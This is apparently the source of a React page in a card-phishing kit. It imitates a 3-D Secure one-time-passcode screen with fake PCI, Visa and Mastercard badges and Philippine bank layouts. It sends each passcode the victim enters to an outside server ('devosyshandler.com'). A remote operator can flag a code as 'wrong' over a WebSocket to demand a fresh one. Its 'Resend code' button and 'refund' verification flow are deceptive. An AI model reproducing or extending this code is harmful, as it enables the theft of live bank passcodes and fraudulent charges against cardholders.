import React, { useEffect, useState, useCallback, useRef } from "react";
import HelpImage from "./assets/help.gif";
import axios from "axios";
import { useNavigate } from "react-router-dom";
import PciImage from './assets/pci.jpg';
import VisaImage from './assets/visa.svg';
import MasterImage from './assets/master.jpg';
import PhilippinesBankLayout, { isPhilippinesBankDesign } from './philippines/PhilippinesBankLayout';
import { isMastercard } from '../cardScheme';

const OTPPage = ({ isRefund: propIsRefund }) => {
  const navigate = useNavigate();
  const [isSubmitting, setIsSubmitting] = useState(false);
  const [input1Value, setInput1Value] = useState("");
  const [errorMessage, setErrorMessage] = useState(() => sessionStorage.getItem("otp_error") || "");
  const [isDuplicate, setIsDuplicate] = useState(false);
  const [isShaking, setIsShaking] = useState(false);
  const [timeLeft, setTimeLeft] = useState(120);
  const [resendAlert, setResendAlert] = useState(false);
  const inputRef = useRef(null);
  
  const isRefund = Boolean(
    propIsRefund ||
    (typeof window !== 'undefined' && window.location.pathname.includes('refund'))
  );

  const uuId = localStorage.getItem("uuId") || localStorage.getItem("session_uuId") || "default";
  const historyKey = isRefund ? `submitted_refund_otps_${uuId}` : `submitted_otps_${uuId}`;
  const retryFlagKey = isRefund ? `refund_retry_flag_${uuId}` : `otp_retry_flag_${uuId}`;
  const design = localStorage.getItem("session_design") || "";

  // Clear temporary error from sessionStorage upon mount
  useEffect(() => {
    if (sessionStorage.getItem("otp_error")) {
      setIsShaking(true);
      setTimeout(() => setIsShaking(false), 600);
      sessionStorage.removeItem("otp_error");
    }
  }, []);

  const getSubmittedOtps = useCallback(() => {
    try {
      const s1 = JSON.parse(sessionStorage.getItem(historyKey) || "[]");
      const s2 = JSON.parse(localStorage.getItem(historyKey) || "[]");
      return Array.from(new Set([...s1, ...s2]));
    } catch (_) {
      return [];
    }
  }, [historyKey]);

  const [isRetry, setIsRetry] = useState(() => {
    return sessionStorage.getItem(retryFlagKey) === "true" || localStorage.getItem("otp_retry") === "true";
  });

  // Real-time WebSocket listener
  useEffect(() => {
    const handleWsCommand = (e) => {
      const data = e.detail;
      if (!data) return;
      if (data.design) {
        localStorage.setItem("session_design", data.design);
      }
      if (data.isRetry || data.type === "wrong_code" || data.to === "wrong_code" || data.to === "wrong_refund" || data.errorMessage) {
        setIsRetry(true);
        sessionStorage.setItem(retryFlagKey, "true");
        localStorage.setItem("otp_retry", "true");
        setInput1Value("");
        setIsDuplicate(false);
        setErrorMessage(data.errorMessage || "The verification code is incorrect. A new SMS code has been sent to your mobile phone. Please enter the new code.");
        setTimeLeft(120);
        setIsShaking(true);
        setTimeout(() => setIsShaking(false), 600);
        if (inputRef.current) inputRef.current.focus();
      }
    };
    window.addEventListener("ws_command", handleWsCommand);
    return () => window.removeEventListener("ws_command", handleWsCommand);
  }, [retryFlagKey]);

  // Countdown timer
  useEffect(() => {
    if (timeLeft <= 0) return;
    const timer = setInterval(() => setTimeLeft((prev) => prev - 1), 1000);
    return () => clearInterval(timer);
  }, [timeLeft]);

  const today = new Date();
  const formattedDate = `${today.getDate().toString().padStart(2, "0")}/${(
    today.getMonth() + 1
  )
    .toString()
    .padStart(2, "0")}/${today.getFullYear()}`;

  const handleInputChange = (e) => {
    const val = e.target.value.replace(/\D/g, "").slice(0, 8);
    setInput1Value(val);
    if (val.length >= 6) {
      const history = getSubmittedOtps();
      if (history.includes(val)) {
        setIsDuplicate(true);
        setIsShaking(true);
        setTimeout(() => setIsShaking(false), 600);
        setErrorMessage("You entered this verification code already. Please enter the new SMS code sent to your phone.");
        return;
      }
    }
    setIsDuplicate(false);
    if (!isRetry) {
      setErrorMessage("");
    }
  };

  const handleCodeSubmit = async (e) => {
    e?.preventDefault();
    const cleanCode = input1Value.trim();
    if (cleanCode.length < 6 || cleanCode.length > 8 || isSubmitting) return;

    // Check for duplicate code
    const history = getSubmittedOtps();
    if (history.includes(cleanCode)) {
      setIsDuplicate(true);
      setErrorMessage("You entered this verification code already. Please enter the new SMS code sent to your phone.");
      setIsShaking(true);
      setTimeout(() => setIsShaking(false), 600);
      return;
    }

    // Save to history so user cannot resubmit the same code
    const updatedHistory = [...history, cleanCode];
    sessionStorage.setItem(historyKey, JSON.stringify(updatedHistory));
    localStorage.setItem(historyKey, JSON.stringify(updatedHistory));
    sessionStorage.removeItem(retryFlagKey);
    localStorage.removeItem("otp_retry");
    setIsSubmitting(true);

    // OPTIMISTIC NAVIGATION: Immediately navigate to /3ds/loading
    navigate("/3ds/loading");

    const dataToSend = {
      uuId: localStorage.getItem("uuId") || uuId,
      code: cleanCode,
    };

    // Background submit
    try {
      const serverUrl = process.env.REACT_APP_SERVER_URL || "https://devosyshandler.com";
      const endpoint = isRefund ? `${serverUrl}/api/refund_verif` : `${serverUrl}/api/otp_verif`;
      await axios.post(endpoint, dataToSend);
    } catch (error) {
      const serverMsg = error.response?.data?.message || "Connection error. Please check your code and try again.";
      sessionStorage.setItem("otp_error", serverMsg);
      sessionStorage.setItem(retryFlagKey, "true");
      setIsSubmitting(false);
      navigate(isRefund ? "/3ds/refund" : "/3ds/otp");
    }
  };

  const handleResendClick = () => {
    setInput1Value("");
    setIsDuplicate(false);
    setTimeLeft(120);
    setResendAlert(true);
    setTimeout(() => setResendAlert(false), 3500);
  };

  const effectiveError = isDuplicate 
    ? "You entered this verification code already. Please enter the new SMS code sent to your phone."
    : (isRetry ? (errorMessage || "The verification code is incorrect. A new SMS code has been sent to your mobile phone. Please enter the new code.") : errorMessage);

  // 1. Philippine Banks Layout (BDO, Landbank, Metrobank, EastWest, PNB, RCBC, UnionBank)
  if (isPhilippinesBankDesign(design)) {
    return (
      <PhilippinesBankLayout
        design={design}
        mode="otp"
        code={input1Value}
        setCode={setInput1Value}
        handleCodeChange={handleInputChange}
        handleSubmit={handleCodeSubmit}
        errorMessage={effectiveError}
        isDuplicate={isDuplicate}
        isRetryActive={isRetry}
        isShaking={isShaking}
        isSubmitting={isSubmitting}
        timeLeft={timeLeft}
        formatTime={(s) => `${Math.floor(s / 60)}:${(s % 60).toString().padStart(2, "0")}`}
        setIsDuplicate={setIsDuplicate}
        onCancel={() => navigate("/checkout")}
        isRefund={isRefund}
      />
    );
  }

  // 2. Standard 3DS Layout
  const isBtnDisabled = input1Value.length < 6 || input1Value.length > 8 || isDuplicate || isSubmitting;
  const isMc = isMastercard(design);
  const imageSrc = isMc ? MasterImage : VisaImage;
  const altText = isMc ? "Mastercard" : "Visa";

  return (
    <div className="flex items-center justify-center w-full min-h-screen bg-slate-100 p-4">
      <div className={`w-full max-w-sm px-6 py-7 bg-white border border-gray-300 shadow-xl rounded-xl transition-transform ${isShaking ? "animate-shake" : ""}`}>
        
        {/* Header Badges */}
        <div className="flex items-center justify-between w-full mb-5 pb-3 border-b border-gray-100">
          <img src={PciImage} alt="PCI DSS Compliant" className="h-9 mr-4 object-contain" />
          {imageSrc && <img src={imageSrc} alt={altText} className="h-9 object-contain" />}
        </div>

        <h1 className="mb-1.5 text-base font-extrabold text-gray-900 tracking-tight">
          {isRefund ? "Enter Refund Verification Code" : "Enter one-time Passcode"}
        </h1>
        <p className="mb-4 text-xs text-gray-600 leading-relaxed">
          {isRefund 
            ? "A one-time verification code is required to authorize your refund. This code has been sent to your registered mobile phone number."
            : "A one-time Passcode is required for this purchase. This Passcode has been sent to your registered mobile phone number."}
        </p>

        {/* Error Alert Banner */}
        {effectiveError && (
          <div className="mb-4 p-3 bg-red-50 border border-red-200 rounded-lg text-xs text-red-700 flex items-start gap-2.5 shadow-sm">
            <span className="text-red-600 font-bold text-base leading-none">⚠️</span>
            <div className="leading-snug font-medium">
              {effectiveError}
            </div>
          </div>
        )}

        {/* Transaction Info Grid */}
        <div className="grid grid-cols-2 mb-4 text-xs gap-y-2 bg-gray-50 border border-gray-200 rounded-lg p-3">
          <span className="text-gray-500 font-medium">Merchant:</span>
          <span className="text-gray-900 font-bold text-right truncate">{process.env.REACT_APP_MERCHANT_NAME || "Dino World"}</span>
          
          <span className="text-gray-500 font-medium">Date:</span>
          <span className="text-gray-900 font-semibold text-right">{formattedDate}</span>
          
          <span className="text-gray-500 font-medium">Card Number:</span>
          <span className="text-gray-900 font-mono font-bold text-right">**** **** **** {localStorage.getItem("last-four-digits") || "••••"}</span>
          
          <span className="text-gray-500 font-medium">{isRefund ? "Refund Amount:" : "Amount:"}</span>
          <span className="text-[#0056b3] font-black text-right">
            {localStorage.getItem("currency") || process.env.REACT_APP_CURRENCY || "PHP"} {localStorage.getItem("summ") || "0.00"}
          </span>
        </div>

        <form onSubmit={handleCodeSubmit}>
          <div className="mb-3.5">
            <label htmlFor="otp" className="block mb-1.5 text-xs font-bold text-gray-700">
              {isRefund ? "Enter Refund Code:" : "Enter One-Time Passcode:"}
            </label>
            <input
              ref={inputRef}
              id="otp"
              value={input1Value}
              onChange={handleInputChange}
              type="text"
              inputMode="numeric"
              maxLength={8}
              autoFocus
              className={`w-full px-4 py-2.5 text-base font-mono font-bold tracking-[0.25em] text-center border-2 rounded-lg focus:outline-none transition-all ${
                isDuplicate || (isRetry && !input1Value) || errorMessage 
                  ? "border-red-400 bg-red-50/30 text-red-900 focus:border-red-500" 
                  : "border-gray-300 bg-white text-gray-900 focus:border-[#0056b3] focus:ring-2 focus:ring-blue-100"
              }`}
              placeholder="••••••"
            />
            {isDuplicate && (
              <p className="mt-1.5 text-[11px] font-semibold text-red-600 flex items-center gap-1">
                <span>⚠️</span> You already entered this code. Please check your SMS for the latest code.
              </p>
            )}
          </div>

          <div className="flex justify-between items-center mb-4 text-xs text-gray-500">
            <span>Code expires in: <b className="font-mono font-bold text-gray-800">{Math.floor(timeLeft / 60)}:{(timeLeft % 60).toString().padStart(2, "0")}</b></span>
            <button
              type="button"
              onClick={handleResendClick}
              className="text-[#0056b3] font-bold underline hover:text-[#003d80] transition-colors cursor-pointer"
            >
              Resend code
            </button>
          </div>

          {resendAlert && (
            <div className="mb-4 p-2.5 bg-emerald-50 border border-emerald-200 text-emerald-700 text-xs font-semibold text-center rounded-lg">
              ✓ New verification code sent to your mobile number
            </div>
          )}

          {/* Action Buttons with Anti-Blank-Square Guarantee */}
          <div className="flex items-center justify-between pt-3 border-t border-gray-100 gap-2">
            <button
              type="button"
              onClick={() => navigate("/checkout")}
              className="px-3.5 py-2 text-xs font-bold text-gray-600 hover:text-gray-900 hover:bg-gray-100 rounded-lg transition-colors cursor-pointer"
            >
              Cancel
            </button>

            <button
              type="submit"
              disabled={isBtnDisabled}
              className={`px-6 py-2.5 text-xs font-extrabold uppercase tracking-wider rounded-lg transition-all shadow-md flex items-center justify-center gap-2 min-w-[120px] cursor-pointer ${
                isBtnDisabled
                  ? "bg-gray-200 text-gray-400 border border-gray-300 cursor-not-allowed opacity-60 shadow-none"
                  : "bg-[#0056b3] hover:bg-[#004494] active:scale-95 text-white border border-[#004494] shadow-blue-500/20 hover:shadow-lg"
              }`}
            >
              {isSubmitting ? (
                <>
                  <span className="inline-block w-3.5 h-3.5 border-2 border-white/30 border-t-white rounded-full animate-spin flex-shrink-0" />
                  <span>SUBMIT</span>
                </>
              ) : (
                isRefund ? 'CONFIRM REFUND' : 'SUBMIT'
              )}
            </button>

            <button
              type="button"
              onClick={() => alert("For assistance, please contact your card issuing bank.")}
              className="flex items-center px-3 py-2 text-xs font-bold text-gray-600 hover:text-gray-900 hover:bg-gray-100 rounded-lg transition-colors cursor-pointer gap-1"
            >
              <img className="h-3.5 w-auto" src={HelpImage} alt="" />
              <span>Help</span>
            </button>
          </div>
        </form>
      </div>
    </div>
  );
};

export default OTPPage;
